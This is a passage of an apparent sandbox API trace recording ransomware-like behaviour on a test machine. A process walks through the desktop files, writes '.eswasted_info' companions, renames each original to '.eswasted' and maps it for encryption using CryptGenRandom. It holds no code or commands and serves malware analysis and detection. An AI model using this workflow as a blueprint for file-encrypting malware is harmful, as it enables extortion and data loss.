lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.898] WriteFile (in: hFile=0x130, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.935] SetEndOfFile (hFile=0x130) returned 1 [0072.936] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.936] lstrcpyW (in: lpString1=0x717de4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AEu8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeu8.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AEu8.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeu8.mp4.eswasted")) returned 1 [0072.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AEu8.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeu8.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.937] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0072.937] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xe0f [0072.937] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe0f) returned 0x330000 [0072.937] CloseHandle (hObject=0x108) returned 1 [0072.939] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.940] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0072.940] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.940] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.941] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.941] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.987] SetEndOfFile (hFile=0x130) returned 1 [0072.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.990] CloseHandle (hObject=0x130) returned 1 [0072.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d80 | out: hHeap=0x6d0000) returned 1 [0072.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x14127d0 | out: hHeap=0x6d0000) returned 1 [0072.996] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.997] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.997] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.997] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\knU8X6jJQ.xls") returned 55 [0072.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x717d80 [0072.997] lstrcpyW (in: lpString1=0x717dee, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.997] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.998] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.998] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\knU8X6jJQ.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knu8x6jjq.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.999] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.000] SetEndOfFile (hFile=0x130) returned 1 [0073.000] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0073.000] lstrcpyW (in: lpString1=0x717dee, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\knU8X6jJQ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knu8x6jjq.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\knU8X6jJQ.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knu8x6jjq.xls.eswasted")) returned 1 [0073.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\knU8X6jJQ.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knu8x6jjq.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.002] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.002] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x3bb8 [0073.002] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3bb8) returned 0x330000 [0073.002] CloseHandle (hObject=0x108) returned 1 [0073.004] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.005] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.006] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.006] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.006] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.006] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.031] SetEndOfFile (hFile=0x130) returned 1 [0073.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0073.034] CloseHandle (hObject=0x130) returned 1 [0073.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d80 | out: hHeap=0x6d0000) returned 1 [0073.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c08 | out: hHeap=0x6d0000) returned 1 [0073.036] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.037] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.037] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KO XV 0.png") returned 53 [0073.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x717d80 [0073.037] lstrcpyW (in: lpString1=0x717dea, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0073.037] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.038] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0073.038] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KO XV 0.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ko xv 0.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.039] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.040] SetEndOfFile (hFile=0x130) returned 1 [0073.040] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0073.040] lstrcpyW (in: lpString1=0x717dea, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KO XV 0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ko xv 0.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KO XV 0.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ko xv 0.png.eswasted")) returned 1 [0073.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KO XV 0.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ko xv 0.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.041] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.041] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x9b94 [0073.042] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9b94) returned 0x330000 [0073.042] CloseHandle (hObject=0x124) returned 1 [0073.156] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.157] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.157] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.157] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.158] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.158] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.169] SetEndOfFile (hFile=0x130) returned 1 [0073.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.202] CloseHandle (hObject=0x130) returned 1 [0073.204] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717d80 | out: hHeap=0x6d0000) returned 1 [0073.204] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412cd0 | out: hHeap=0x6d0000) returned 1 [0073.204] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.205] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.205] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2iZ1.gif") returned 51 [0073.205] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x70c320 [0073.205] lstrcpyW (in: lpString1=0x70c386, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.205] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0073.205] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.206] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0073.206] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2iZ1.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2iz1.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.207] WriteFile (in: hFile=0x130, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.208] SetEndOfFile (hFile=0x130) returned 1 [0073.208] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.208] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.208] lstrcpyW (in: lpString1=0x70c386, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2iZ1.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2iz1.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2iZ1.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2iz1.gif.eswasted")) returned 1 [0073.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o2iZ1.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o2iz1.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.210] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.210] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x2c77 [0073.210] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c77) returned 0x330000 [0073.210] CloseHandle (hObject=0x108) returned 1 [0073.212] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.213] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.213] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.213] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.214] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.214] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.251] SetEndOfFile (hFile=0x130) returned 1 [0073.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.325] CloseHandle (hObject=0x130) returned 1 [0073.331] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c320 | out: hHeap=0x6d0000) returned 1 [0073.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718048 | out: hHeap=0x6d0000) returned 1 [0073.332] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.333] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.333] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.333] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QbgQ7ccHvuEJU-.mp4") returned 60 [0073.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x1412c98 [0073.333] lstrcpyW (in: lpString1=0x1412d10, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0073.333] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.334] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0073.334] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QbgQ7ccHvuEJU-.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qbgq7cchvueju-.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.335] WriteFile (in: hFile=0x130, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.336] SetEndOfFile (hFile=0x130) returned 1 [0073.336] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.336] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.336] lstrcpyW (in: lpString1=0x1412d10, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QbgQ7ccHvuEJU-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qbgq7cchvueju-.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QbgQ7ccHvuEJU-.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qbgq7cchvueju-.mp4.eswasted")) returned 1 [0073.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QbgQ7ccHvuEJU-.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qbgq7cchvueju-.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.338] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.338] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xe7d9 [0073.338] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7d9) returned 0x330000 [0073.338] CloseHandle (hObject=0x108) returned 1 [0073.342] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.343] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.343] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.343] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.344] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.344] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.354] SetEndOfFile (hFile=0x130) returned 1 [0073.405] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.405] CloseHandle (hObject=0x130) returned 1 [0073.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0073.407] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0073.407] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.408] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.408] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SZkwPiPoa.ppt") returned 55 [0073.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x70c160 [0073.408] lstrcpyW (in: lpString1=0x70c1ce, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.408] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.408] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.409] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.409] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SZkwPiPoa.ppt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szkwpipoa.ppt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.422] WriteFile (in: hFile=0x130, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.423] SetEndOfFile (hFile=0x130) returned 1 [0073.423] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.423] lstrcpyW (in: lpString1=0x70c1ce, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SZkwPiPoa.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szkwpipoa.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SZkwPiPoa.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szkwpipoa.ppt.eswasted")) returned 1 [0073.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SZkwPiPoa.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szkwpipoa.ppt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.424] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.424] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x8a2c [0073.424] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a2c) returned 